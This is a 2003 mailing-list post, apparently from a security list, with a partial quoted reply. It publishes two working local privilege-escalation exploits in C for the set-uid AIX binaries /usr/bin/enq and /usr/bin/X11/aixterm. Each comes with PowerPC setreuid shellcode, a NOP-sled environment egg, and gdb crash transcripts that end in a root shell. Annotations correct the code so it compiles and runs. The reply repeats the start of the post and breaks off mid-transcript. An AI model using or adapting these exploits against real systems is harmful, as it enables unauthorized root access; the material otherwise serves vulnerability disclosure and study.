/usr/bin/enq and /usr/bin/X11/aixterm exploit in AIX
Feb 17 2003 07:00AM
choi sungwoon (monocat2 hanmail net)
(1 replies)
/*
Title: /usr/bin/enq and /usr/bin/X11/aixterm exploit in AIX
Vulnerability found by Esa Etelavoun, iDEFENSE
Author: green(green (at) wowhacker (dot) org [email concealed]), dragory(dragory (at) wowhacker (dot) org [email concealed])
Tested on AIX 4.3.3/RS6000
Reference: lsd-pl.net's exploit
Thanks to wowcode & overhead team at Wowhacker(http://www.wowhacker.org)
*/
I have recently been testing stack buffer overflows (BOF) on AIX.
Below are local exploits for the set-uid root binaries /usr/bin/enq and /usr/bin/X11/aixterm on AIX.
(My system locale is Korean, so some of the program messages in the transcripts below are in Korean.)
1. /usr/bin/enq
/*
http://online.securityfocus.com/bid/2034
[green@aix test]$ /usr/bin/enq -M `perl -e 'print "a"x2000'`
enq: (경고): 0781-132 메세지 파일
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa을(를) 열 수 없습니다.
enq: errno = 86: 파일이나 경로 이름이 너무 깁니다.
Segmentation fault
[green@aix test]$ su -
root의 암호:
# gdb /usr/bin/enq
GNU gdb 5.0-aix51-020209
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "powerpc-ibm-aix4.3.3.0"...(no debugging
symbols found)...
(gdb) r -M `perl -e 'print "abcd"x700'`
Starting program: /usr/bin/enq -M `perl -e 'print "abcd"x700'`
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...enq: (경고): 0781-132 메세지 파일
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcenq: (경고): 0781-132 메세지 파일
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcda
enq: errno = 86: 파일이나 경로 이름이 너무 깁니다.
Program received signal SIGSEGV, Segmentation fault.
0x62636460 in ?? () from (unknown load module)
(gdb) r -M `perl -e 'print "abcd"x5000'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/bin/enq -M `perl -e 'print "abcd"x5000'`
Program received signal SIGSEGV, Segmentation fault.
0xd018a654 in getenv ()
(gdb) q
[green@aix test]$ id
uid=205(green) gid=1(staff)
[green@aix test]$ ./aix_enq
enq: (WARNING): Can't open message
file //////////////////////////////////////////////////enq: (WARNING):
Can't open message
file /////////////////////////////////////////////////////?
enq: errno = 86: File name too long
# id
uid=205(green) gid=1(staff) euid=0(root) egid=9(printq)
#
exploited by green.
*/
#define ADRNUM 3000      /* bytes of the repeated 4-byte address guess placed in the -M argument */
#define NOPNUM 16000     /* bytes of the 4-byte `nop` written ahead of the shellcode in the egg */
#define ADR_ALLIGN 0     /* extra leading address bytes: shifts where the 4-byte pattern falls */
#define ALLIGN 0         /* spaces inserted after "xxx=" before the nop run */
/*
 * Payload appended after the NOP run inside the "xxx=" environment variable:
 * 76 bytes of PowerPC machine code followed by the literal "/bin/sh".
 * None of the bytes is 0x00, so strlen() measures the whole thing.
 * The name suggests a setreuid()+shell stub, and the transcript above does
 * end in an euid=0 shell, but the instruction stream is not annotated here --
 * treat that reading as unverified.
 */
char setreuidcode[]=
"\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
"\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
"\x4c\xc6\x33\x42\x44\xff\xff\x02\x92\x03\xff\xff\x38\x75\xff\x04"
"\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10"
"\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh";
/* Four-byte filler repeated NOPNUM times ahead of the shellcode.
 * 0x7ffffb78 decodes to the PowerPC instruction `or r31,r31,r31`, which
 * changes no state; the trailing 0 is only the string terminator. */
char nop[]={0x7f,0xff,0xfb,0x78,0};
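/*
 * Entry point of the enq exploit.
 *
 * Builds two attacker-controlled strings and then replaces this process with
 * the set-uid /usr/bin/enq via execle():
 *
 *   -M argument : ADR_ALLIGN + ADRNUM bytes made of the guessed 4-byte
 *                 address repeated back to back.  ADR_ALLIGN leading bytes
 *                 shift the pattern so the address lands aligned on the
 *                 overwritten return-address slot (the gdb runs above crash
 *                 at a slice of the "abcd" pattern, which is how that offset
 *                 was worked out).
 *   environment : a single variable "xxx=" followed by ALLIGN spaces,
 *                 NOPNUM bytes of `nop` and then `setreuidcode`.
 *
 * The address guess is the lsd-pl.net AIX idiom: walk this process's own
 * environment to estimate where the strings end above the envp array, then
 * back off 8000 bytes so that, in the exec'd child, the guess falls inside
 * the ~16 KB NOP run that the lone "xxx=" variable occupies near the top of
 * the stack.  Nothing can verify the guess before the exec; if it is off,
 * enq just crashes.
 *
 * Fix relative to the original: `buffer` was declared as 3000 bytes but the
 * loops below write ADR_ALLIGN + ADRNUM bytes (3000 with these defaults)
 * and then a terminating NUL, i.e. one byte past the end.  Both payload
 * arrays are now sized from the macros that drive the loops.
 *
 * argc/argv are unused.  `e` is the process environment (a non-standard
 * third main() parameter; it receives the environment pointer on AIX).
 * Returns 1 only if execle() fails; on success it never returns.
 */
int main(int argc,char **argv,char **e){
    /* +1 for the NUL that terminates the -M argument. */
    char buffer[ADR_ALLIGN+ADRNUM+1];
    /* "xxx=" + ALLIGN spaces + NOP run + shellcode; sizeof counts the NUL. */
    char egg[4+ALLIGN+NOPNUM+sizeof setreuidcode];
    /* Holds one unsigned long; on the ILP32 AIX 4.3 target that is the 4
     * bytes the loops below repeat.  Sized from the type so an LP64 build
     * cannot write past it. */
    char adr[sizeof(unsigned long)];
    char *b,*envp[2];
    int i;

    (void)argc;
    (void)argv;

    /*
     * NOTE(review): because of the post-increment, each iteration measures
     * the *next* environment string, and the last iteration calls strlen()
     * on the NULL terminator.  That presumably only survives because 32-bit
     * AIX maps page 0 readable -- confirm before porting; it would segfault
     * on most other systems.  Kept verbatim so the estimate stays the one
     * the exploit was tuned against; only (i & ~3) is used.
     */
    i=0; while(*e++) i+=strlen(*e)+1;
    *((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;

    /* Only one variable is passed, so the egg sits at a predictable spot. */
    envp[0]=egg;
    envp[1]=0;

    /* -M argument: ADR_ALLIGN shift bytes, then ADRNUM bytes of the guess. */
    b=buffer;
    for(i=0;i<ADR_ALLIGN;i++) *b++=adr[i%4];
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    *b=0;

    /* Egg: "xxx=" | ALLIGN spaces | NOP run | shellcode. */
    b=egg;
    sprintf(b,"xxx=");b+=4;
    for(i=0; i<ALLIGN;i++) *b++=' ';
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
    *b=0;

    execle("/usr/bin/enq", "enq", "-M", buffer, (char *)0, envp);
    return 1;   /* execle() only returns on failure */
}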
------------------------------------------------------------------------
---
--------------------------------
2. /usr/bin/X11/aixterm
/*
[dragory@aix dragory]$ cp /usr/bin/X11/aixterm ./test
[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im `perl -
e 'print "x"x400'`
Segmentation fault (core dumped)
[dragory@aix dragory]$ gdb -q test core
(no debugging symbols found)...Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...#0
0x78787878 in ?? () from (unknown load module)
(gdb) q
[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im a`perl -
e 'print "abcd"x100'`
[dragory@aix dragory]$ gdb -q test core
(no debugging symbols found)...Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...#0
0x63646160 in ?? () from (unknown load module)
(gdb) q
[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im ab`perl -
e 'print "abcd"x100'`
[dragory@aix dragory]$ gdb -q test core
(no debugging symbols found)...Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...#0
0x62636460 in ?? () from (unknown load module)
(gdb) q
[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im abc`perl -
e 'print "abcd"x100'`
[dragory@aix dragory]$ gdb -q test core
(no debugging symbols found)...Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...#0
0x61626364 in ?? () from (unknown load module)
(gdb) q
// => ADR_ALLIGN = 3: only with a 3-byte prefix does the crash address become
//    an aligned "abcd" (0x61626364 above), so the repeated address must be
//    shifted by 3 bytes to land squarely on the overwritten return address.
[dragory@aix dragory]$ uname
AIX
[dragory@aix dragory]$ ls -l /usr/bin/X11/aixterm
-rwsr-xr-x 1 root system 376096 7월 20 1999 /usr/bin/X11/aixterm
[dragory@aix dragory]$ id
uid=218(dragory) gid=1(staff)
[dragory@aix dragory]$ gcc -o aixterm_exp aixterm_exp.c
[dragory@aix dragory]$ ./aixterm_exp -d X.X.X.X:0
# id
uid=218(dragory) gid=1(staff) euid=0(root)
#
The vulnerability was discovered by Euan Briggs.
exploited by dragory.
*/
// Based on the enq exploit above, originally written by green.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define ADRNUM 1000      /* bytes of the repeated 4-byte address guess placed in the -im argument */
#define NOPNUM 16000     /* bytes of the 4-byte `nop` written ahead of the shellcode in the egg */
#define ADR_ALLIGN 3     /* default leading address bytes (see the gdb runs above); -a overrides */
#define ALLIGN 0         /* default spaces after "xxx=" before the nop run; -A overrides */
#define HOST_IP "1.1.1.1:0"   /* default X display handed to aixterm -display; -d overrides */
/*
 * Payload appended after the NOP run inside the "xxx=" environment variable:
 * 76 bytes of PowerPC machine code followed by the literal "/bin/sh".
 * None of the bytes is 0x00, so strlen() measures the whole thing.
 * The name suggests a setreuid()+shell stub, and the transcript above does
 * end in an euid=0 shell, but the instruction stream is not annotated here --
 * treat that reading as unverified.
 */
char setreuidcode[]=
"\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
"\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
"\x4c\xc6\x33\x42\x44\xff\xff\x02\x92\x03\xff\xff\x38\x75\xff\x04"
"\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10"
"\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh";
// This shellcode is the one used for AIX 4.3.x; other releases may need a different stub.
/* Four-byte filler repeated NOPNUM times ahead of the shellcode.
 * 0x7ffffb78 decodes to the PowerPC instruction `or r31,r31,r31`, which
 * changes no state; the trailing 0 is only the string terminator. */
char nop[]={0x7f,0xff,0xfb,0x78,0};
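int usage(char *arg);

/*
 * Entry point of the aixterm exploit.
 *
 * Options:
 *   -d HOST:DISPLAY   X display aixterm should connect to (default HOST_IP)
 *   -a N              ADR_ALLIGN override: leading address bytes (default 3)
 *   -A N              ALLIGN override: spaces before the NOP run (default 0)
 *
 * Payload layout is the same as in the enq exploit above: the -im argument
 * is adr_allign + ADRNUM bytes of the guessed address repeated, and the
 * single environment variable "xxx=" carries allign spaces, NOPNUM bytes of
 * `nop` and then `setreuidcode`.  The gdb runs above show why the default
 * shift is 3: only with a 3-byte prefix does the crash address become an
 * aligned "abcd" (0x61626364).
 *
 * Fixes relative to the original:
 *   - -d used strcpy() into a 10-byte array sized from "1.1.1.1:0", so any
 *     realistic "a.b.c.d:0" overflowed the exploit's own stack.  The option
 *     now just points at optarg.
 *   - -a / -A were fed to fixed-size arrays unchecked; they are now
 *     range-checked against sizeof buffer / sizeof egg before use.
 *   - the stray "pl.net" token left behind by a line-wrapped URL comment
 *     (which stopped the listing from compiling) is gone.
 *
 * `e` is the process environment (a non-standard third main() parameter;
 * it receives the environment pointer on AIX), used for the lsd-pl.net-style
 * address estimate.
 * Returns 0 after printing usage, 1 on a bad option value or a failed exec;
 * does not return when execle() succeeds.
 */
int main(int argc,char **argv,char **e) {
    char buffer[3000],egg[20000],*b,*envp[2];
    /* Holds one unsigned long; on the ILP32 AIX 4.3 target that is the 4
     * bytes the loops below repeat.  Sized from the type so an LP64 build
     * cannot write past it. */
    char adr[sizeof(unsigned long)];
    const char *host_ip = HOST_IP;
    int i, opt, adr_allign = ADR_ALLIGN, allign = ALLIGN;
    int max_adr_allign, max_allign;

    if(argc < 2) {
        usage(argv[0]);
        exit(0);
    }
    while((opt = getopt(argc, argv, "d:a:A:")) != -1) {
        switch(opt) {
        case 'd':
            host_ip = optarg;   /* argv storage outlives us: no copy needed */
            break;
        case 'a':
            adr_allign = atoi(optarg);
            break;
        case 'A':
            allign = atoi(optarg);
            break;
        case '?':
        default:
            usage(argv[0]);
            exit(0);
        }
    }

    /* Keep both payloads (plus their terminating NUL) inside their arrays. */
    max_adr_allign = (int)sizeof buffer - ADRNUM - 1;
    if (adr_allign < 0 || adr_allign > max_adr_allign) {
        fprintf(stderr, "ADR_ALLIGN must be between 0 and %d\n", max_adr_allign);
        exit(1);
    }
    max_allign = (int)(sizeof egg - 4 - NOPNUM - strlen(setreuidcode) - 1);
    if (allign < 0 || allign > max_allign) {
        fprintf(stderr, "ALLIGN must be between 0 and %d\n", max_allign);
        exit(1);
    }

    /*
     * Address estimate (http://lsd-pl.net).  NOTE(review): because of the
     * post-increment, each iteration measures the *next* environment string
     * and the last iteration calls strlen() on the NULL terminator.  That
     * presumably only survives because 32-bit AIX maps page 0 readable --
     * confirm before porting; it would segfault on most other systems.
     * Kept verbatim so the estimate stays the one the exploit was tuned
     * against; only (i & ~3) is used.
     */
    i=0; while(*e++) i+=strlen(*e)+1;
    *((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;

    /* Only one variable is passed, so the egg sits at a predictable spot. */
    envp[0]=egg;
    envp[1]=0;

    /* -im argument: adr_allign shift bytes, then ADRNUM bytes of the guess. */
    b=buffer;
    for(i=0;i<adr_allign;i++) *b++=adr[i%4];
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    *b=0;

    /* Egg: "xxx=" | allign spaces | NOP run | shellcode. */
    b=egg;
    sprintf(b,"xxx=");b+=4;
    for(i=0; i<allign;i++) *b++=' ';
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
    *b=0;

    execle("/usr/bin/X11/aixterm", "aixterm", "-display", host_ip, "-im",
           buffer, (char *)0, envp);
    perror("execle");   /* only reached when the exec fails */
    return 1;
}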
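/*
 * Print the command-line help for the aixterm exploit on stdout.
 * `arg` is argv[0], echoed in the usage line.  Returns 0 (callers ignore it).
 * Fix relative to the original: the two string literals had been broken
 * across lines by mail wrapping and would not compile; they are rejoined.
 */
int usage(char *arg) {
    printf("Usage : %s -d [Your X Server IP:0] -a [ADR_ALLIGN] -A [ALLIGN]\n", arg);
    printf("Default : [Your X Server IP:0]=1.1.1.1:0 ADR_ALLIGN=3 ALLIGN=0\n");
    printf("If not exploited, you may modify ALLIGN, Your X Server IP\n");
    return 0;
}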
Re: /usr/bin/enq and /usr/bin/X11/aixterm exploit in AIX
Feb 18 2003 11:23AM
Keith Stevenson (keith stevenson louisville edu)
/*
Title: /usr/bin/enq and /usr/bin/X11/aixterm exploit in AIX
Vulnerability found by Esa Etelavoun, iDEFENSE
Author: green(green (at) wowhacker (dot) org [email concealed]), dragory(dragory (at) wowhacker (dot) org [email concealed])
Tested on AIX 4.3.3/RS6000
Reference: lsd-pl.net's exploit
Thanks to wowcode & overhead team at Wowhacker(http://www.wowhacker.org)
*/
I have recently been testing stack buffer overflows (BOF) on AIX.
Below are local exploits for the set-uid root binaries /usr/bin/enq and /usr/bin/X11/aixterm on AIX.
(My system locale is Korean, so some of the program messages in the transcripts below are in Korean.)
1. /usr/bin/enq
/*
http://online.securityfocus.com/bid/2034
[green@aix test]$ /usr/bin/enq -M `perl -e 'print "a"x2000'`
enq: (경고): 0781-132 메세지 파일
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa을(를) 열 수 없습니다.
enq: errno = 86: 파일이나 경로 이름이 너무 깁니다.
Segmentation fault
[green@aix test]$ su -
root의 암호:
# gdb /usr/bin/enq
GNU gdb 5.0-aix51-020209
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
